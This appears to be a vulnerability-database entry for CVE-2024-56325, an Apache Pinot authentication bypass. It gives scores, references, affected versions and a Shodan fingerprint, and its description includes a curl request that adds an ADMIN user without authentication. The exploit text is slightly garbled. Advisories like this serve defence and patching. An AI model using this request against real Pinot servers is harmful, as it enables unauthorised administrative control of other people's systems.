CVE-2024-56325

CRITICAL NUCLEI

Apache Pinot < 1.3.0 - Authentication Bypass

Title source: rule

Description

Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.

Nuclei Templates (1)

Apache Pinot < 1.3.0 - Authentication Bypass

CRITICALVERIFIEDby iamnoooob,rootxharsh,pdresearch

Shodan: http.favicon.hash:1696974531

References (2)

[Mailing List, Vendor Advisory] https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v

[Mailing List, Third Party Advisory] http://www.openwall.com/lists/oss-security/2025/03/27/8

Scores

CVSS v3 9.8

EPSS 0.2786

EPSS Percentile 96.4%

Attack Vector NETWORK

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Classification

CWE

CWE-288

Status published

Affected Products (4)

apache/pinot < 1.3.0

org.apache.pinot/pinot-broker < 1.3.0Maven

org.apache.pinot/pinot-common < 1.3.0Maven

org.apache.pinot/pinot-controller < 1.3.0Maven

Timeline

Published Apr 01, 2025

Tracked Since Feb 18, 2026